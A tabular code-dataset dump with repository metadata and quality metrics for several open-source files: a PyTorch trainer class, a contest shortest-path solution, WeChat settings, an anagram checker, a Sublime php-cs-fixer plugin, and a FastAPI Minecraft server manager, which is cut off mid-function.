hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
822a641495e4387a0c1f14cf9ebd06d65a7a819c | 7,355 | py | Python | jdit/trainer/single/sup_single.py | dingguanglei/jdit | ef878e696c9e2fad5069f106496289d4e4cc6154 | [
"Apache-2.0"
] | 28 | 2019-06-18T15:56:53.000Z | 2021-11-09T13:11:13.000Z | jdit/trainer/single/sup_single.py | dingguanglei/jdit | ef878e696c9e2fad5069f106496289d4e4cc6154 | [
"Apache-2.0"
] | 2 | 2018-10-24T01:09:56.000Z | 2018-11-08T07:13:48.000Z | jdit/trainer/single/sup_single.py | dingguanglei/jdit | ef878e696c9e2fad5069f106496289d4e4cc6154 | [
"Apache-2.0"
] | 8 | 2019-01-11T01:12:15.000Z | 2021-03-12T10:15:43.000Z | from ..super import SupTrainer
from tqdm import tqdm
import torch
from jdit.optimizer import Optimizer
from jdit.model import Model
from jdit.dataset import DataLoadersFactory
class SupSingleModelTrainer(SupTrainer):
""" This is a Single Model Trainer.
It means you only have one model.
input, gound_truth
output = model(input)
loss(output, gound_truth)
"""
def __init__(self, logdir, nepochs, gpu_ids_abs, net: Model, opt: Optimizer, datasets: DataLoadersFactory):
super(SupSingleModelTrainer, self).__init__(nepochs, logdir, gpu_ids_abs=gpu_ids_abs)
self.net = net
self.opt = opt
self.datasets = datasets
self.fixed_input = None
self.input = None
self.output = None
self.ground_truth = None
def train_epoch(self, subbar_disable=False):
for iteration, batch in tqdm(enumerate(self.datasets.loader_train, 1), unit="step", disable=subbar_disable):
self.step += 1
self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
self.output = self.net(self.input)
self._train_iteration(self.opt, self.compute_loss, csv_filename="Train")
if iteration == 1:
self._watch_images("Train")
def get_data_from_batch(self, batch_data: list, device: torch.device):
""" Load and wrap data from the data lodaer.
Split your one batch data to specify variable.
Example::
# batch_data like this [input_Data, ground_truth_Data]
input_cpu, ground_truth_cpu = batch_data[0], batch_data[1]
# then move them to device and return them
return input_cpu.to(self.device), ground_truth_cpu.to(self.device)
:param batch_data: one batch data load from ``DataLoader``
:param device: A device variable. ``torch.device``
:return: input Tensor, ground_truth Tensor
"""
input_tensor, ground_truth_tensor = batch_data[0], batch_data[1]
return input_tensor, ground_truth_tensor
def _watch_images(self, tag: str, grid_size: tuple = (3, 3), shuffle=False, save_file=True):
""" Show images in tensorboard
To show images in tensorboad. If want to show fixed input and it's output,
please use ``shuffle=False`` to fix the visualized data.
Otherwise, it will sample and visualize the data randomly.
Example::
# show fake data
self.watcher.image(self.output,
self.current_epoch,
tag="%s/output" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
# show ground_truth
self.watcher.image(self.ground_truth,
self.current_epoch,
tag="%s/ground_truth" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
# show input
self.watcher.image(self.input,
self.current_epoch,
tag="%s/input" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
:param tag: tensorboard tag
:param grid_size: A tuple for grad size which data you want to visualize
:param shuffle: If shuffle the data.
:param save_file: If save this images.
:return:
"""
self.watcher.image(self.output,
self.current_epoch,
tag="%s/output" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
self.watcher.image(self.ground_truth,
self.current_epoch,
tag="%s/ground_truth" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
def compute_loss(self) -> (torch.Tensor, dict):
""" Rewrite this method to compute your own loss Discriminator.
Use self.input, self.output and self.ground_truth to compute loss.
You should return a **loss** for the first position.
You can return a ``dict`` of loss that you want to visualize on the second position.like
Example::
var_dic = {}
var_dic["LOSS"] = loss_d = (self.output ** 2 - self.groundtruth ** 2) ** 0.5
return: loss, var_dic
"""
loss: torch.Tensor
var_dic = {}
return loss, var_dic
def compute_valid(self) -> dict:
""" Rewrite this method to compute your validation values.
Use self.input, self.output and self.ground_truth to compute valid loss.
You can return a ``dict`` of validation values that you want to visualize.
Example::
# It will do the same thing as ``compute_loss()``
var_dic, _ = self.compute_loss()
return var_dic
"""
# It will do the same thing as ``compute_loss()``
var_dic, _ = self.compute_loss()
return var_dic
def valid_epoch(self):
"""Validate model each epoch.
It will be called each epoch, when training finish.
So, do same verification here.
Example::
avg_dic: dict = {}
self.net.eval()
for iteration, batch in enumerate(self.datasets.loader_valid, 1):
self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
with torch.no_grad():
self.output = self.net(self.input)
dic: dict = self.compute_valid()
if avg_dic == {}:
avg_dic: dict = dic
else:
for key in dic.keys():
avg_dic[key] += dic[key]
for key in avg_dic.keys():
avg_dic[key] = avg_dic[key] / self.datasets.nsteps_valid
self.watcher.scalars(avg_dic, self.step, tag="Valid")
self.loger.write(self.step, self.current_epoch, avg_dic, "Valid", header=self.step <= 1)
self._watch_images(tag="Valid")
self.net.train()
"""
avg_dic: dict = {}
self.net.eval()
for iteration, batch in enumerate(self.datasets.loader_valid, 1):
self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
with torch.no_grad():
self.output = self.net(self.input)
dic: dict = self.compute_valid()
if avg_dic == {}:
avg_dic: dict = dic
else:
# 求和
for key in dic.keys():
avg_dic[key] += dic[key]
for key in avg_dic.keys():
avg_dic[key] = avg_dic[key] / self.datasets.nsteps_valid
self.watcher.scalars(avg_dic, self.step, tag="Valid")
self.loger.write(self.step, self.current_epoch, avg_dic, "Valid", header=self.current_epoch <= 1)
self._watch_images(tag="Valid")
self.net.train()
def test(self):
pass
| 37.146465 | 116 | 0.562882 | 885 | 7,355 | 4.501695 | 0.19096 | 0.027108 | 0.03012 | 0.023845 | 0.500251 | 0.477159 | 0.433986 | 0.416918 | 0.416918 | 0.398845 | 0 | 0.003537 | 0.346431 | 7,355 | 197 | 117 | 37.335025 | 0.825255 | 0.4707 | 0 | 0.176471 | 0 | 0 | 0.016552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.014706 | 0.088235 | 0 | 0.264706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
822adefd2d61243c8a6b7d51a859f435ee02768e | 1,433 | py | Python | Gold/sol.py | papachristoumarios/IEEEXtreme11.0 | 4c3b5aaa71641a6d0b3e9823c4738050f2553b27 | [
"MIT"
] | 13 | 2018-10-11T14:13:56.000Z | 2022-02-17T18:30:17.000Z | Gold/sol.py | papachristoumarios/IEEEXtreme11.0-PComplete | 4c3b5aaa71641a6d0b3e9823c4738050f2553b27 | [
"MIT"
] | null | null | null | Gold/sol.py | papachristoumarios/IEEEXtreme11.0-PComplete | 4c3b5aaa71641a6d0b3e9823c4738050f2553b27 | [
"MIT"
] | 7 | 2018-10-24T08:36:59.000Z | 2021-07-19T18:16:53.000Z | import heapq
import sys
primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53]
bounds = [1]
for pr in primes:
bounds.append(bounds[-1]*pr)
def gold(town_id):
i = 0
while bounds[i] <= town_id:
i += 1
return i - 1
def solve():
N, M = [int(i) for i in raw_input().split()]
ids = [int(raw_input()) for _ in xrange(N)]
town_gold = {town_id: gold(town_id) for town_id in ids}
adj = {}
for i in ids:
adj[i] = []
for _ in xrange(M):
i, j, w = [int(i) for i in raw_input().split()]
adj[i].append((j, w))
adj[j].append((i, w))
start, end = min(ids), max(ids)
visited = set()
max_dist = sys.maxint/2
min_dist = {town_id: max_dist for town_id in ids}
min_dist[start] = 0
queue = [(0, -gold(start), start)]
while queue:
curr_dist, curr_gold, curr_node = heapq.heappop(queue)
if curr_node in visited:
continue
if curr_node == end:
print -curr_gold
break
for next_node, dist in adj[curr_node]:
if next_node in visited:
continue
next_dist = curr_dist + dist
if min_dist[next_node] >= next_dist:
min_dist[next_node] = next_dist
heapq.heappush(queue, (next_dist, curr_gold-town_gold[next_node], next_node))
def main():
solve()
if __name__ == "__main__":
main()
| 26.537037 | 93 | 0.551291 | 222 | 1,433 | 3.346847 | 0.297297 | 0.056528 | 0.040377 | 0.021534 | 0.161507 | 0.123822 | 0.061911 | 0.061911 | 0 | 0 | 0 | 0.036735 | 0.31612 | 1,433 | 53 | 94 | 27.037736 | 0.721429 | 0 | 0 | 0.043478 | 0 | 0 | 0.005583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0 | 0.043478 | 0 | 0.130435 | 0.021739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
822bbf9836e86e5cf6fb48c971df002aa5f8085b | 511 | py | Python | src/wechat/settings.py | chuter/wechat-requests | 23591f8e04e795a1727e6a8029602cfb2dde90f1 | [
"MIT"
] | 3 | 2019-06-17T10:54:03.000Z | 2021-01-29T08:25:01.000Z | src/wechat/settings.py | chuter/wechat-requests | 23591f8e04e795a1727e6a8029602cfb2dde90f1 | [
"MIT"
] | 2 | 2020-03-24T15:46:37.000Z | 2020-03-30T20:26:19.000Z | src/wechat/settings.py | chuter/wechat-requests | 23591f8e04e795a1727e6a8029602cfb2dde90f1 | [
"MIT"
] | null | null | null | # -*- encoding: utf-8
from .utils import build_user_agent
# common
DEFAULT_HEADERS = {
'User-Agent': build_user_agent()
}
TIMEOUT = 1
ENCODING = 'utf-8'
RETRYS = 3
RETRY_BACKOFF_FACTOR = 0.1
RETRY_STATUS_FORCELIST = frozenset([500, 502, 504])
# auth
OAUTH_HOST = 'open.weixin.qq.com'
AUTH_EXPIRED_CODES = frozenset([40001, 40014, 41001, 42001])
# pay
TRADE_TYPE_JSAPI = 'JSAPI' # 公众号支付
TRADE_TYPE_NATIVE = 'NATIVE' # 扫码支付
TRADE_TYPE_APP = 'APP' # APP支付
SIGN_TYPE = 'MD5'
SIGN_NONCE_STR_LEN = 32
| 17.033333 | 60 | 0.712329 | 75 | 511 | 4.56 | 0.72 | 0.078947 | 0.070175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088785 | 0.162427 | 511 | 29 | 61 | 17.62069 | 0.71028 | 0.101761 | 0 | 0 | 0 | 0 | 0.110865 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
822c63b5e55693f8beb5a21c86e5722b43fcabfd | 1,070 | py | Python | leetcode/0242_valid_anagram.py | chaosWsF/Python-Practice | ff617675b6bcd125933024bb4c246b63a272314d | [
"BSD-2-Clause"
] | null | null | null | leetcode/0242_valid_anagram.py | chaosWsF/Python-Practice | ff617675b6bcd125933024bb4c246b63a272314d | [
"BSD-2-Clause"
] | null | null | null | leetcode/0242_valid_anagram.py | chaosWsF/Python-Practice | ff617675b6bcd125933024bb4c246b63a272314d | [
"BSD-2-Clause"
] | null | null | null | """
Given two strings s and t , write a function to determine if t is an anagram of s.
Example 1:
Input: s = "anagram", t = "nagaram"
Output: true
Example 2:
Input: s = "rat", t = "car"
Output: false
Note:
You may assume the string contains only lowercase alphabets.
Follow up:
What if the inputs contain unicode characters? How would you adapt your solution to such case?
"""
from collections import Counter
class Solution:
def isAnagram1(self, s, t):
return sorted(s) == sorted(t)
def isAnagram2(self, s, t):
if len(s) != len(t):
return False
d_s = {}
d_t = {}
for ss, tt in zip(s, t):
if ss in d_s:
d_s[ss] += 1
else:
d_s[ss] = 1
if tt in d_t:
d_t[tt] += 1
else:
d_t[tt] = 1
return d_s == d_t
def isAnagram3(self, s, t): # 28ms, 13MB
return Counter(s) == Counter(t) if len(s) == len(t) else False
| 22.291667 | 98 | 0.507477 | 155 | 1,070 | 3.43871 | 0.464516 | 0.018762 | 0.033771 | 0.026266 | 0.041276 | 0.041276 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0.392523 | 1,070 | 47 | 99 | 22.765957 | 0.8 | 0.382243 | 0 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.047619 | 0.095238 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
822e6649f5126724e28587501bc18c3cf971a81b | 4,144 | py | Python | phpcsfixer.py | makao/sublime-php-cs-fixer | ff3227a2877a3e59c5bf9fc6e10f7aef56db8ef5 | [
"MIT"
] | 1 | 2018-11-26T19:42:41.000Z | 2018-11-26T19:42:41.000Z | phpcsfixer.py | makao/sublime-php-cs-fixer | ff3227a2877a3e59c5bf9fc6e10f7aef56db8ef5 | [
"MIT"
] | 2 | 2018-01-10T05:15:08.000Z | 2018-12-04T15:41:29.000Z | phpcsfixer.py | makao/sublime-php-cs-fixer | ff3227a2877a3e59c5bf9fc6e10f7aef56db8ef5 | [
"MIT"
] | null | null | null | import os
import re
import sublime
import sublime_plugin
import subprocess
STVER = int(sublime.version())
class PHPCSFixer():
def __init__(self):
self.settings = PhpCsFixerSettings()
if sublime.active_window() is not None and sublime.active_window().active_view() is not None:
self.file = sublime.active_window().active_view().file_name()
def run(self, file=None):
if file is None:
file = self.file
if not self.settings.isPHPFile():
return
if not self.settings.isAllowedExtension(file):
return
cmd = self.buildCommand(file)
result = self.execute(cmd)
self.showOutput(result)
def buildCommand(self, file):
rules = self.settings.get('rules')
if (self.settings.get('executable')):
cmd = [self.settings.get('executable')]
else:
cmd = ['php-cs-fixer']
cmd.append('fix');
cmd.append(os.path.normpath(file))
cmd.append('-vvv')
cmd.append('--using-cache=no')
if rules is None or not rules:
return cmd
rules_list = '--rules='
for rule in rules:
rules_list += rule + ','
cmd.append(rules_list[:-1])
return cmd
def execute(self, cmd):
process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return process.communicate()[0].decode()
def showOutput(self, result):
lines = re.finditer('.*(?P<line>\d+)\) (?P<file>.*)', result)
files = []
for line in lines:
file = line.group('file')
rules = file[file.find("(")+1:file.find(")")]
file = re.sub('\(.*?\)','', file)
files.append([os.path.basename(file), rules])
sublime.active_window().show_quick_panel(files, self.onDone)
def onDone(selected, self):
return
class PhpCsFixerFixCommand(sublime_plugin.TextCommand):
def run(edit, self):
PHPCSFixer().run()
class PhpCsFixerEventListener(sublime_plugin.EventListener):
def on_post_save(self, view):
settings = PhpCsFixerSettings()
if not settings.get('on_save'):
return
PHPCSFixer().run(view.file_name())
class PhpCsFixerSettings():
def __init__(self):
if sublime.active_window() is not None and sublime.active_window().active_view() is not None:
self.sublime = sublime.active_window().active_view().settings()
self.project = self.sublime.get('php-cs-fixer')
else:
self.sublime = {}
self.project = {}
self.plugin = sublime.load_settings('PHPCSFixer.sublime-settings')
def get(self, key, default=None):
if self.project is not None and self.project.get(key) is not None:
return self.project.get(key)
if self.plugin.get(key) is not None:
return self.plugin.get(key)
return default
def isPHPFile(self):
syntax = self.sublime.get('syntax')
if syntax is None:
return False
if syntax.endswith('PHP.tmLanguage') or syntax.endswith('PHP.sublime-syntax'):
return True
return False
def isAllowedExtension(self, filename):
ignored = self.get('ignored_extensions', [])
for ext in ignored:
if filename.endswith(ext):
return False
return True
class PhpCsFixerOpenFileCommand(sublime_plugin.ApplicationCommand):
@staticmethod
def run(file):
platform_name = {
'osx': 'OSX',
'windows': 'Windows',
'linux': 'Linux',
}[sublime.platform()]
file = file.replace('${platform}', platform_name)
sublime.run_command('open_file', {'file': file})
@staticmethod
def is_visible():
return STVER < 3124
class PhpCsFixerEditSettingsCommand(sublime_plugin.ApplicationCommand):
@staticmethod
def run(**kwargs):
sublime.run_command('edit_settings', kwargs)
@staticmethod
def is_visible():
return STVER >= 3124
| 27.812081 | 112 | 0.600386 | 464 | 4,144 | 5.267241 | 0.247845 | 0.037234 | 0.054419 | 0.040917 | 0.177578 | 0.153846 | 0.113748 | 0.061375 | 0.061375 | 0.061375 | 0 | 0.003663 | 0.275338 | 4,144 | 148 | 113 | 28 | 0.81019 | 0 | 0 | 0.211009 | 0 | 0 | 0.067809 | 0.006515 | 0 | 0 | 0 | 0 | 0 | 1 | 0.146789 | false | 0 | 0.045872 | 0.027523 | 0.40367 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8234be85b1a5c920b993e015367a06c4e394d65b | 11,961 | py | Python | main.py | iTecAI/minecraft-socket | 72f3bbc4fb20bea4b837d093c734eab2798de89d | [
"MIT"
] | null | null | null | main.py | iTecAI/minecraft-socket | 72f3bbc4fb20bea4b837d093c734eab2798de89d | [
"MIT"
] | null | null | null | main.py | iTecAI/minecraft-socket | 72f3bbc4fb20bea4b837d093c734eab2798de89d | [
"MIT"
] | null | null | null | from json.decoder import JSONDecodeError
from fastapi import FastAPI, Response, Request
from fastapi.staticfiles import StaticFiles
from argparse import ArgumentParser
from starlette.status import *
from starlette.responses import FileResponse, JSONResponse
import uvicorn
import os
from pymongo import MongoClient
from pymongo.database import Database
import json
from util import fetch_jarinfo, defaults
import logging
from logging import debug, info, warning, error, critical, exception
import threading
import time
from models import *
import hashlib
import random
import server_manager
import requests
import base64
AUTHENTICATED_CONNECTIONS = {}
def fetch_loop(db: Database):
WAIT = 12 # Delay between fetches (hours)
while True:
info('Fetching minecraft version info.')
jar_info = fetch_jarinfo()
jar_info['record'] = 'versions'
info('Found {mc} vanilla versions and {paper} papermc versions. Latest version is {latest}. Latest snapshot is {latest_snap}.'.format(
mc=str(len(jar_info['vanilla'])),
paper=str(len(jar_info['paper'])),
latest=jar_info['latest']['release'],
latest_snap=jar_info['latest']['snapshot']
))
db.versions.replace_one({'record': 'versions'}, jar_info, upsert=True)
time.sleep(WAIT * 3600)
if __name__ == '__main__':
parser = ArgumentParser(description='Run minecraft-socket server.')
parser.add_argument('--config', default='config.json', help='Path to config file (JSON)')
args = parser.parse_args()
try:
with open(args.config, 'r') as c:
os.environ['MC-CONFIG'] = json.dumps(json.load(c))
except JSONDecodeError:
print('FATAL: Bad JSON structure.')
exit(0)
except FileNotFoundError:
print(f'FATAL: {args.config} not found.')
exit(0)
CONF = json.loads(os.environ['MC-CONFIG'])
uvicorn.run('main:app', host=CONF['runtime']['host'], port=CONF['runtime']['port'], access_log=False)
else:
try:
CONFIG = json.loads(os.environ['MC-CONFIG'])
except:
print(f'FATAL: config not loaded.')
exit(0)
logging.basicConfig(
format=CONFIG["logging"]["format"],
level=logging.getLevelName(CONFIG["logging"]["level"].upper()),
)
info('Loading connection to DB')
db = CONFIG['database']
mongodb = MongoClient(
host=db['ip'],
port=db['port'],
username=db['username'],
password=db['password'],
tls=db['secure']
)
database = mongodb.minecraft_socket
info('Starting fetch thread.')
fetch_thread = threading.Thread(target=fetch_loop, name='mcjar_fetch_thread', daemon=True, args=[database])
fetch_thread.start()
info('Checking env setup.')
if not os.path.exists(CONFIG['server_folder']):
os.makedirs(CONFIG['server_folder'])
info('Starting server manager.')
manager = server_manager.ServerManager(CONFIG['server_folder'], database)
app = FastAPI()
app.mount('/web', StaticFiles(directory='web'), 'staticfiles')
@app.get('/')
async def get_index():
return FileResponse(os.path.join('web', 'index.html'))
@app.middleware('http')
async def auth(request: Request, call_next):
for k in list(AUTHENTICATED_CONNECTIONS.keys()):
if AUTHENTICATED_CONNECTIONS[k]+CONFIG['connection_timeout'] < time.time():
del AUTHENTICATED_CONNECTIONS[k]
if request.url.path == '/' or request.url.path.startswith('/web') or request.url.path == '/auth':
return await call_next(request)
else:
if 'x-authkey' in request.headers.keys():
if request.headers['x-authkey'] in AUTHENTICATED_CONNECTIONS.keys():
return await call_next(request)
else:
return JSONResponse({'result': 'failure', 'reason': 'Auth key not recognized.'}, HTTP_403_FORBIDDEN)
else:
return JSONResponse({'result': 'failure', 'reason': 'Auth key not passed in headers.'}, HTTP_403_FORBIDDEN)
@app.post('/auth')
async def post_auth(request: Request, response: Response):
model = await request.json()
hashed_pass = hashlib.sha256(CONFIG['password'].encode('utf-8')).hexdigest()
if hashed_pass == model['passhash']:
cid = hashlib.sha256(str(time.time()+random.random()).encode('utf-8')).hexdigest()
AUTHENTICATED_CONNECTIONS[cid] = time.time()
return {'result': 'success', 'connection_id': cid}
else:
response.status_code = HTTP_403_FORBIDDEN
return {'result': 'failure', 'reason': 'Incorrect passcode.'}
@app.get('/versions')
async def get_versions(response: Response, request: Request):
try:
res = database.versions.find_one({'record': 'versions'})
del res['_id']
del res['record']
return res
except:
return {
'latest': {'release': None, 'snapshot': None},
'paper': {},
'vanilla': {}
}
@app.post('/servers/new')
async def new_server(req: Request, res: Response):
fields = defaults(await req.json(), defs={
'max_memory': 2, # GB
'name': f'server_{int(time.time())}',
'server_port': 25565,
'server_ip': '',
'world_seed': '',
'whitelist': True,
'max_players': 20,
'difficulty': 'hard',
'gamemode': 'survival',
'motd': 'Minecraft Server Running on Minecraft-Socket [iTecAI]',
'command_blocks': True,
'other_args': ''
}) # also requires {jar: url or base-64 encoded jar}
if os.path.exists(os.path.join(CONFIG['server_folder'], fields['name'])):
res.status_code = HTTP_405_METHOD_NOT_ALLOWED
return {'result': 'failure', 'reason': f'Server {fields["name"]} already exists.'}
if not 'jar' in fields.keys():
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Server jar not specified'}
info(f'Creating new server {fields["name"]} running at {fields["server_ip"]}:{fields["server_port"]}.')
os.mkdir(os.path.join(CONFIG['server_folder'], fields['name']))
with open(os.path.join(CONFIG['server_folder'], fields['name'], 'eula.txt'), 'w') as f:
f.write('eula=true')
with open('server.properties.template', 'r') as f:
properties = f.read().format(
gamemode=fields['gamemode'],
cmdblocks='true' if fields['command_blocks'] else 'false',
motd=fields['motd'],
seed=fields['world_seed'],
difficulty=fields['difficulty'],
max_players=str(fields['max_players']),
server_ip=fields['server_ip'],
server_port=str(fields['server_port']),
whitelist='true' if fields['whitelist'] else 'false'
)
with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.properties'), 'w') as f:
f.write(properties)
database.servers.insert_one({
'max_memory': fields['max_memory'],
'name': fields['name'],
'java_args': fields['other_args'],
'address': fields['server_ip']+':'+str(fields['server_port']),
'enabled': True
})
if 'https://' in fields['jar'] or 'http://' in fields['jar']:
response = requests.get(fields['jar'], stream=True)
with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.jar'), 'wb') as fd:
for chunk in response.iter_content(chunk_size=128):
fd.write(chunk)
else:
with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.jar'), 'wb') as fd:
fd.write(base64.b64decode(fields['jar'].split('base64,')[1].encode('utf-8')))
manager.start_server(fields['name'])
return {'result': 'success'}
@app.post('/servers/{name}/stop')
async def stop_server(name: str, res: Response):
try:
manager.stop_server(name)
return {'result': 'success'}
except KeyError:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} not online.'}
@app.post('/servers/{name}/delete')
async def delete_server(name: str, res: Response):
try:
manager.stop_server(name)
except KeyError:
pass
database.servers.delete_one({'name': name})
return {'result': 'success'}
@app.get('/servers/{name}/logs')
async def get_logs(name: str, res: Response):
try:
manager.get_logs(name)
return {'result': 'success', 'logs': manager.get_logs(name)}
except KeyError:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} not online.'}
@app.post('/servers/{name}/command')
async def command_server(name: str, res: Response, req: Request):
fields = await req.json()
if not 'command' in fields.keys():
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Command not passed'}
try:
manager.command_server(name, fields['command'])
except KeyError:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} not online.'}
return {'result': 'success'}
@app.post('/servers/{name}/start')
async def start_server(name: str, res: Response):
try:
manager.start_server(name)
except KeyError:
res.status_code = HTTP_404_NOT_FOUND
